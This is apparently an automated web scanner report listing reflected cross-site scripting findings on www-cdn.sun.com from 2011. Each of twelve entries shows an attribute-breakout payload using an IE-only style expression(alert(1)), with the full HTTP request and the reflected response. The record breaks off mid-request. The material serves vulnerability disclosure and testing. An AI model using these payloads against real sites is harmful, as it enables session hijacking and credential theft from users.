XSS, Cross Site Scripting, CWE-79, CAPEC-86, www-cdn.sun.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

1.1. http://www-cdn.sun.com/css/common.css [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8f5b"style%3d"x%3aexpression(alert(1))"66663d12923 was submitted in the REST URL parameter 1. This input was echoed as e8f5b"style="x:expression(alert(1))"66663d12923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /csse8f5b"style%3d"x%3aexpression(alert(1))"66663d12923/common.css HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:15:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/csse8f5b"style="x:expression(alert(1))"66663d12923/common.css&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.2. http://www-cdn.sun.com/css/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5957a"style%3d"x%3aexpression(alert(1))"30fb4361845 was submitted in the REST URL parameter 2. This input was echoed as 5957a"style="x:expression(alert(1))"30fb4361845 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css/common.css5957a"style%3d"x%3aexpression(alert(1))"30fb4361845 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css/common.css5957a"style="x:expression(alert(1))"30fb4361845&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.3. http://www-cdn.sun.com/css/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a3d6"style%3d"x%3aexpression(alert(1))"b235f93f031 was submitted in the REST URL parameter 1. This input was echoed as 4a3d6"style="x:expression(alert(1))"b235f93f031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css4a3d6"style%3d"x%3aexpression(alert(1))"b235f93f031/default.css HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:16:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16039

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css4a3d6"style="x:expression(alert(1))"b235f93f031/default.css&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.4. http://www-cdn.sun.com/css/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef95"style%3d"x%3aexpression(alert(1))"59b076fcc71 was submitted in the REST URL parameter 2. This input was echoed as 7ef95"style="x:expression(alert(1))"59b076fcc71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css/default.css7ef95"style%3d"x%3aexpression(alert(1))"59b076fcc71 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16039

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css/default.css7ef95"style="x:expression(alert(1))"59b076fcc71&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.5. http://www-cdn.sun.com/css/dropdown-behavior.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/dropdown-behavior.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b796c"style%3d"x%3aexpression(alert(1))"c7885036f7a was submitted in the REST URL parameter 1. This input was echoed as b796c"style="x:expression(alert(1))"c7885036f7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cssb796c"style%3d"x%3aexpression(alert(1))"c7885036f7a/dropdown-behavior.css HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/cssb796c"style="x:expression(alert(1))"c7885036f7a/dropdown-behavior.css&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.6. http://www-cdn.sun.com/css/dropdown-behavior.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/dropdown-behavior.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8d8"style%3d"x%3aexpression(alert(1))"1be08f8bd0 was submitted in the REST URL parameter 2. This input was echoed as 5a8d8"style="x:expression(alert(1))"1be08f8bd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css/dropdown-behavior.css5a8d8"style%3d"x%3aexpression(alert(1))"1be08f8bd0 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:18:20 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16066

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css/dropdown-behavior.css5a8d8"style="x:expression(alert(1))"1be08f8bd0&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.7. http://www-cdn.sun.com/css/k5.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/k5.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1787c"style%3d"x%3aexpression(alert(1))"a880e1245f9 was submitted in the REST URL parameter 1. This input was echoed as 1787c"style="x:expression(alert(1))"a880e1245f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css1787c"style%3d"x%3aexpression(alert(1))"a880e1245f9/k5.css HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:15:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css1787c"style="x:expression(alert(1))"a880e1245f9/k5.css&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.8. http://www-cdn.sun.com/css/k5.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/k5.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b003"style%3d"x%3aexpression(alert(1))"686d98e1b09 was submitted in the REST URL parameter 2. This input was echoed as 3b003"style="x:expression(alert(1))"686d98e1b09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css/k5.css3b003"style%3d"x%3aexpression(alert(1))"686d98e1b09 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31535999
Date: Sun, 06 Mar 2011 15:17:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css/k5.css3b003"style="x:expression(alert(1))"686d98e1b09&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.9. http://www-cdn.sun.com/css/master.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/master.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61419"style%3d"x%3aexpression(alert(1))"dd1fa32ccf1 was submitted in the REST URL parameter 1. This input was echoed as 61419"style="x:expression(alert(1))"dd1fa32ccf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css61419"style%3d"x%3aexpression(alert(1))"dd1fa32ccf1/master.css HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:14:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css61419"style="x:expression(alert(1))"dd1fa32ccf1/master.css&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.10. http://www-cdn.sun.com/css/master.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/master.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b3e"style%3d"x%3aexpression(alert(1))"d4cdc1e0b52 was submitted in the REST URL parameter 2. This input was echoed as 37b3e"style="x:expression(alert(1))"d4cdc1e0b52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css/master.css37b3e"style%3d"x%3aexpression(alert(1))"d4cdc1e0b52 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css/master.css37b3e"style="x:expression(alert(1))"d4cdc1e0b52&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.11. http://www-cdn.sun.com/css/oo_style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/oo_style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d83a"style%3d"x%3aexpression(alert(1))"69fe7c954ea was submitted in the REST URL parameter 1. This input was echoed as 8d83a"style="x:expression(alert(1))"69fe7c954ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css8d83a"style%3d"x%3aexpression(alert(1))"69fe7c954ea/oo_style.css HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:16:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css8d83a"style="x:expression(alert(1))"69fe7c954ea/oo_style.css&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.12. http://www-cdn.sun.com/css/oo_style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/css/oo_style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e233c"style%3d"x%3aexpression(alert(1))"25ced8cb3df was submitted in the REST URL parameter 2. This input was echoed as e233c"style="x:expression(alert(1))"25ced8cb3df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /css/oo_style.csse233c"style%3d"x%3aexpression(alert(1))"25ced8cb3df HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
